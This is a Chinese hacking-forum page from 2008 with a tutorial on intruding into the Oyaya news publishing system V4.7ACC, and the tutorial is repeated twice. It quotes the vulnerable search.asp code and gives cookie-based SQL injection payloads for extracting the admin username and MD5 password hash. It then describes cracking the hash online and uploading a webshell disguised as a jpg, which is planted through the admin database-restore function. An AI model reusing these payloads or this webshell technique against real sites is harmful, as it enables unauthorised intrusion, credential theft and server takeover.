 |
 |
凹丫丫新闻发布系统V4.7ACC by[Z.S.T]冰雪风谷
| 授权类型: | 黑客 | 特别说明: |
| 软件分类: | 一天学一点 | |
| 文件大小: | MB | |
| 星级评定: |  |
|
| 发 布 人: | 幻泉 | |
| 发布时间: | 2008-12-31 1:21:48 | |
| 下载权限: | 10,9,8,7,6,5,11,12,13 | |
| 权限说明: | 0 游客;1 普通用户;2 C培训班;3 工具培训班;4 脚本培训班;
5 黑客防线技术团队;6 银牌VIP;7 金牌VIP;8 钻石VIP;
9 铂金VIP;10 管理用户;11 贵宾组;12 核心组;13 顾问组;
15 linux培训班;16 漏洞发掘培训班;17 delphi培训班;
18 java培训班;19 综合实战班;20 vc远控编写班;21 win服务器安全;
22 逆向工程培训班;23 高级xss培训班;24 驱动开发培训班. *无下载权限显示则表示所有注册会员均可下载。 |
|
| 下载次数: | 177 人次 | |
| 下载地址: |
 下载地址1
|
|
asp入侵6-凹丫丫新闻发布系统V4.7ACC(by[z.s.t]冰雪风谷)
先跟大家讲下找注入点的方法...
一般?id=***的,这种页面,是标准的,有可能产生注入的地方,但大多数程序员肯定会在request.string的地方加以限制和判断....而有些程序员偷懒,用request(‘id’)这样来获取数据,这样就可以用cookie注入了.
拿到oyaya的代码,先看search.asp页面,一般在关键字查询的地方,会过滤不是很严,所以先看这里.
key=request("key")
otype=request("otype")
if key="" then
response.write "<script>alert('查找字符串不能为空!');history.back();</script>"
response.end
end if
只对字符串是否为空进行了判断,if otype="title" then
sql="select * from news where title like '%"& key &"%' order by id desc"
直接放进来查询,可以注入.
现在拿绿色浏览器来给大家演示注入过程 .绿色浏览器有一个插件,叫jsCookier可以修改页面的cookie.
我们随便查询d,打开这个页面,然后如图,增加cookie的值 key=d’ and (select count(*)from admin)>0 and ‘1’like’1
看到关键字那里已经变成了key的值..呵呵,接下来,就是构造sql注入语句了,我相信这个就不用演示了吧.注入的时候,用户名默认是oyaya,大家可以’ and (select asc(mid(admin,N,1)))>0 and ‘1’like’1 来试第一位和最后一位,如果是的话,说明管理员没改用户名.注密码的时候,看下代码 , md5 = lcase(wordtohex(a) & wordtohex(b) & wordtohex(c) & wordtohex(d)) '32byte
'md5 = lcase(wordtohex(b) & wordtohex(c)) 'i crop this to fit 16byte database password :d
32位的密码,只要取中间16位就OK了,
(1-8)
(9-16)1511b4f6
(17-24)020ec61d
(25-32)
我们
http://www.cmd5.com/default.aspx中查到密码是654321,
呵呵,有了用户名和密码,现在进入后台.
后台被管理员改为user/这个路径了.进入后台后,有恢复数据的地方,我们随便找一上传图片的地方,然后把自己的马改为,jpg形式,上传.然后在恢复数据库这里,把数据库的地址改为jpg的马的地址,把下面要恢复的路径改为自己想添加的目录..好了,现在马已经备份上去了.
我的教程也该结束了.
如果大家还有什么疑问,可以给我发邮件联系.
我的邮箱是:bingxuefenggu@126.com 嗯.注入那里没讲太详细,嗯.需要手工注哦...太麻烦了,属于体力活.哈哈.但我想,大家对注入应该不算陌生吧.这里只是换了种方式注入而已.
end
先跟大家讲下找注入点的方法...
一般?id=***的,这种页面,是标准的,有可能产生注入的地方,但大多数程序员肯定会在request.string的地方加以限制和判断....而有些程序员偷懒,用request(‘id’)这样来获取数据,这样就可以用cookie注入了.
拿到oyaya的代码,先看search.asp页面,一般在关键字查询的地方,会过滤不是很严,所以先看这里.
key=request("key")
otype=request("otype")
if key="" then
response.write "<script>alert('查找字符串不能为空!');history.back();</script>"
response.end
end if
只对字符串是否为空进行了判断,if otype="title" then
sql="select * from news where title like '%"& key &"%' order by id desc"
直接放进来查询,可以注入.
现在拿绿色浏览器来给大家演示注入过程 .绿色浏览器有一个插件,叫jsCookier可以修改页面的cookie.
我们随便查询d,打开这个页面,然后如图,增加cookie的值 key=d’ and (select count(*)from admin)>0 and ‘1’like’1
看到关键字那里已经变成了key的值..呵呵,接下来,就是构造sql注入语句了,我相信这个就不用演示了吧.注入的时候,用户名默认是oyaya,大家可以’ and (select asc(mid(admin,N,1)))>0 and ‘1’like’1 来试第一位和最后一位,如果是的话,说明管理员没改用户名.注密码的时候,看下代码 , md5 = lcase(wordtohex(a) & wordtohex(b) & wordtohex(c) & wordtohex(d)) '32byte
'md5 = lcase(wordtohex(b) & wordtohex(c)) 'i crop this to fit 16byte database password :d
32位的密码,只要取中间16位就OK了,
(1-8)
(9-16)1511b4f6
(17-24)020ec61d
(25-32)
我们
http://www.cmd5.com/default.aspx中查到密码是654321, 呵呵,有了用户名和密码,现在进入后台.
后台被管理员改为user/这个路径了.进入后台后,有恢复数据的地方,我们随便找一上传图片的地方,然后把自己的马改为,jpg形式,上传.然后在恢复数据库这里,把数据库的地址改为jpg的马的地址,把下面要恢复的路径改为自己想添加的目录..好了,现在马已经备份上去了.
我的教程也该结束了.
如果大家还有什么疑问,可以给我发邮件联系.
我的邮箱是:bingxuefenggu@126.com 嗯.注入那里没讲太详细,嗯.需要手工注哦...太麻烦了,属于体力活.哈哈.但我想,大家对注入应该不算陌生吧.这里只是换了种方式注入而已.
end
相关黑客软件
